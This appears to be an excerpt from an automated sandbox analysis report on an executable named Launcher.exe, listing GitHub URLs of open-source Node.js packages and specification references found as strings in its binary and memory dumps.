          Source: Launcher.exe, 00000000.00000003.1138033598.00000174E04E3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Rob--W/proxy-from-env.git
          Source: Launcher.exe, 00000000.00000003.1138033598.00000174E04E3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Rob--W/proxy-from-env/issues
          Source: Launcher.exe, 00000000.00000003.1459581379.00000174E09FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify#readme
          Source: Launcher.exe, 00000000.00000003.1459581379.00000174E09FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify.git
          Source: Launcher.exe, 00000000.00000003.1459581379.00000174E09FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify/issues
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/SheetJS/js-crc32/issues
          Source: Launcher.exe, 00000000.00000003.1210752491.00000174E0880000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1220923642.00000174E0880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/file-uri-to-path
          Source: Launcher.exe, 00000000.00000003.1210752491.00000174E0880000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1220923642.00000174E0880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/file-uri-to-path/issues
          Source: Launcher.exe, 00000000.00000003.1229981135.00000174E0635000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E0635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-bindings
          Source: Launcher.exe, 00000000.00000003.1229981135.00000174E0635000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E0635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-bindings/issues
          Source: Launcher.exe, 00000000.00000003.1149072420.00000174E0639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/util-deprecate
          Source: Launcher.exe, 00000000.00000003.1149072420.00000174E0639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/util-deprecate/issues
          Source: Launcher.exe, 00000000.00000003.1229981135.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302231555.00000174E0383000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1232344631.00000174E0380000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E05FD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302709891.00000174E040D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3
          Source: Launcher.exe, 00000000.00000003.1229981135.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302231555.00000174E0383000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1232344631.00000174E0380000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E05FD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302709891.00000174E040D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3.git
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/blob/b05f4594cf8b0de64743561fcd2cfe6f4571754d/CHANGELOG.md)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/releases)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/wiki/API#databaseloadextensionpath-callback)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/wiki/API)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TryGhost/node-sqlite3/workflows/CI/badge.svg?branch=master)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WICG/scheduling-apis
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
          Source: Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E05CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Yqnn/node-readdir-glob
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js#L23
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/acornjs/acorn/issues/575
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
          Source: Launcher.exe, 00000000.00000003.1124547608.00000174E0464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/alexindigo/asynckit#readme
          Source: Launcher.exe, 00000000.00000003.1124547608.00000174E0464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/alexindigo/asynckit.git
          Source: Launcher.exe, 00000000.00000003.1124547608.00000174E0464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/alexindigo/asynckit/issues
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A52000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1147575346.00000174E068D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils#readme
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A52000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1147575346.00000174E068D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils.git
          Source: Launcher.exe, 00000000.00000003.1271727944.000001F349E01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A72000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1131941974.00000174E0691000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134121610.00000174E06EF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils/blob/master/LICENSE
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1131941974.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A52000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1147575346.00000174E068D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/archiver-utils/issues
          Source: Launcher.exe, 00000000.00000003.1130016639.00000174E0575000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver
          Source: Launcher.exe, 00000000.00000003.1130016639.00000174E0575000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver.git
          Source: Launcher.exe, 00000000.00000003.1134655854.00000174E05BB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E0619000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1229981135.00000174E0619000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1202995845.00000174E0922000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E0621000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E0575000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E05BB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1158702898.00000174E0534000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1202995845.00000174E092E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05F5000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E058D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191986739.00000174E0528000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1262056482.000003F1D1F01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1158702898.00000174E0538000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver/blob/master/LICENSE
          Source: Launcher.exe, 00000000.00000003.1202995845.00000174E092A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1256739910.000002CA4EC01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08D6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08EE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver/blob/master/LICENSE-MIT
          Source: Launcher.exe, 00000000.00000003.1130016639.00000174E0575000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-archiver/issues
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons.git
          Source: Launcher.exe, 00000000.00000003.1191125437.00000174E0428000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1175489451.00000174E0428000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191125437.00000174E0438000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1195308680.00000174E0967000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1175489451.00000174E0444000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269515805.0000036AF2301000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E08A4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E089C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E08AC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191125437.00000174E0450000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191125437.00000174E0454000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1185814574.00000174E095B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1175489451.00000174E0454000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191125437.00000174E043C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E08A0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1175489451.00000174E043C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 
00000000.00000003.1177023374.00000174E08B0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1184973623.00000174E041C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons/blob/master/LICENSE-MIT
          Source: Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-compress-commons/issues
          Source: Launcher.exe, 00000000.00000003.1195308680.00000174E097F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream.git
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream.gitA
          Source: Launcher.exe, 00000000.00000003.1165538286.00000174E0A6A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1185814574.00000174E097F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1165538286.00000174E0A6E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1185814574.00000174E096B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream/blob/master/LICENSE-MIT
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-crc32-stream/issues
          Source: Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream
          Source: Launcher.exe, 00000000.00000003.1177023374.00000174E0880000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream.git
          Source: Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream.gitf
          Source: Launcher.exe, 00000000.00000003.1177023374.00000174E087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream/blob/master/LICENSE
          Source: Launcher.exe, 00000000.00000003.1177023374.00000174E0880000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1237160190.0000037A4AA81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream/issues
          Source: Launcher.exe, 00000000.00000003.1251348991.0000005159041000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/archiverjs/node-zip-stream/issues);
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/artiz)
          Source: Launcher.exe, 00000000.00000003.1398162788.00000174E05CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite
          Source: Launcher.exe, 00000000.00000003.1398162788.00000174E05CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/issues
          Source: Launcher.exe, 00000000.00000003.1423798353.00000174E0DA1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1423798353.00000174E0DAD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1423798353.00000174E0D91000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Javascript-source-file-encodings
          Source: Launcher.exe, 00000000.00000003.1423798353.00000174E0DA1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1423798353.00000174E0DAD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1423798353.00000174E0D91000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Use-Buffers-when-decoding
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/audriusk)
          Source: Launcher.exe, 00000000.00000003.1118712238.00000174E043A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/axios/axios/issues/69
          Source: Launcher.exe, 00000000.00000003.1419380194.00000174E07B0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1415719735.00000174E04D6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1389723018.00000174E313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bradhugh/node-dpapi
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brianloveswords/buffer-crc32
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brianloveswords/buffer-crc32/raw/master/LICENSE
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brianloveswords/buffer-crc32/raw/master/LICENSEA
          Source: Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args
          Source: Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args.git
          Source: Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args/issues
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyneo)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit#downloads
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit).
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit/wiki/Using-Node-modules)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/nw-gyp)
          Source: Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg)
          Source: Launcher.exe, 00000000.00000003.1202995845.00000174E0942000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl
          Source: Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl.git
          Source: Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl.gitA
          Source: Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl1f
          Source: Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ry)
          Source: Launcher.exe, 00000000.00000003.1462539823.00000174E0520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/shellac
          Source: Launcher.exe, 00000000.00000003.1280865643.0000036048281000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/RubenVerborgh
          Source: Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/isaacs
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/springmeyer)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sqlcipher/sqlcipher)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
          Source: Launcher.exe, 00000000.00000003.1317934326.00000174E5501000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1342161238.00000174E07AC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1282750493.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tlrobinson/long-stack-traces
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tmcw)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/raw/master/LICENSE).
